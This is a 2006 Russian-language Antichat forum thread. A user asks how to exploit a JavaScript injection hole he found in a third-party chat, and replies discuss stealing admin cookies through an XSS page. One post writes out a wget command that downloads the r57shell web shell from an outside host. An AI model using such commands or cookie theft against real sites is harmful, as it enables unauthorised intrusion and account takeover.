ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Java Script Including ??
  #1  
Старый 31.05.2006, 19:44
Аватар для Adio
Adio
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031

Репутация: 71


По умолчанию Java Script Including ??

Привет всем нашол дыру в чате мона вставлять java script самое интересное я всегда почти дыры нахожу ))) Но вот юзать их я не умею что подскажите ? Сервер Апач 2.11 помойму система Win nt И вообще что можно вставить с помошью жава скрипт ??? кроме чтение cookies ...????
 

  #2  
Старый 31.05.2006, 19:47
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

гениальный пост
особенно название

пофигу какой версии апач стоит, пофигу какая ОС... с помощью джава скрипта ты как нистранно, можешь много что сделать, на что соображалки хватит, то и делай. А вот кукисы ты благодаря снифферу "читаешь".. java script лишь проводник
 

  #3  
Старый 31.05.2006, 20:01
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

У меня такая же проблема!!!! ПОМОГИТЕ!!! Короче я нашел vb-including. Т.е. я выполняю на системе vbscript:alert(); и он РАБОТАЕТ! Но когда я пытаюсь залить шелл vbscript:wget http://rst.void.ru/download/r57shell.txt -0 etoneshell.php он наверное ошибается и синтакс меняется! Как быть???

Люди плиз, иначе я красным писать начну!
 

  #4  
Старый 31.05.2006, 21:18
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Java Script Including. Долго я угорал над названия темы
__________________
-=Ok let's Go=-
-=OpenVPN=-
 

  #5  
Старый 31.05.2006, 22:34
Аватар для drmist
drmist
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609

Репутация: 239
По умолчанию

Охренеть........
три ответа трех мемберов с >300 почтов, а содержание "ты дурак, мы умные"

Adio
На будущее перед тем, как задавать вопрос, советую Вам воспользоваться поиском по форуму. Если Вы не нашли ответ на Ваш вопрос, воспользуйтесь поисковыми системами google.com или yandex.ru.
Вот например полезные темы из раздела "Статьи":
http://forum.antichat.ru/threadnav18872-1-10.html
http://forum.antichat.ru/threadnav18719-1-10.html
http://forum.antichat.ru/threadnav13949-1-10.html
http://forum.antichat.ru/thread12124.html

Также советую прочитать мою статью:
http://www.security-teams.net/index.php?showtopic=2492
__________________
Никому нельзя верить...
 

  #6  
Старый 31.05.2006, 22:36
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

drmist, ни в коем случае. Я согласен, что не раскрыл тему. Какой вопрос - таков ответ.
А ты молодец. Надеюсь создателю топика эти ссылки помогут.
 

  #7  
Старый 01.06.2006, 21:32
Аватар для Adio
Adio
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031

Репутация: 71


По умолчанию

Привет вот собственно и я ))) Пасибо за ссылки )) конешшно )) но у меня вопрос такой
Можно как то пробраться на сервер с помощью жава скрипт ??? потому что только жава скрипт и html распазнаёт ( так вот только кукисы мона тырить получаеться ???
Ну раз никак с помощью java script нильзя то скажите как мона тырить cookie без использование ALERT ??? тоесть типа мышкой по картинке куки в лог ?
 

  #8  
Старый 04.06.2006, 13:33
Аватар для dEm0N
dEm0N
Новичок
Регистрация: 20.05.2006
Сообщений: 3
Провел на форуме:
2686

Репутация: 0
По умолчанию

Если можна вставить java script то можна спырить админские кукисы...........
 

  #9  
Старый 04.06.2006, 13:35
Аватар для dEm0N
dEm0N
Новичок
Регистрация: 20.05.2006
Сообщений: 3
Провел на форуме:
2686

Репутация: 0
По умолчанию

читай }{акер там по веб хаку дофига инфы.
Кста дай ссылку на етот чат, я его покалупаю маленько...
 

  #10  
Старый 05.06.2006, 11:53
Аватар для Adio
Adio
Постоянный
Регистрация: 23.05.2005
Сообщений: 617
Провел на форуме:
1262031

Репутация: 71


По умолчанию

КАк мона Стрырить Админские Кукисы ??? Заставить админа зайти на xss сраничку ? )))
Да он не дурак по ходу дела !
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Pубрика "Полезные решения на PHP" Utochka PHP, PERL, MySQL, JavaScript 28 23.05.2006 10:06
Возможности Java Script Razial Чаты 8 10.01.2006 18:17
Новый Мултиплеер для GTA:VC - vc-mp xSp1D3R Болталка 5 16.08.2005 02:20
Java Script - серьезно ли это? ][s0u1 С/С++, C#, Delphi, .NET, Asm 6 15.04.2005 11:53
Словарь Java-терминов foreva Чужие Статьи 0 08.02.2005 16:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ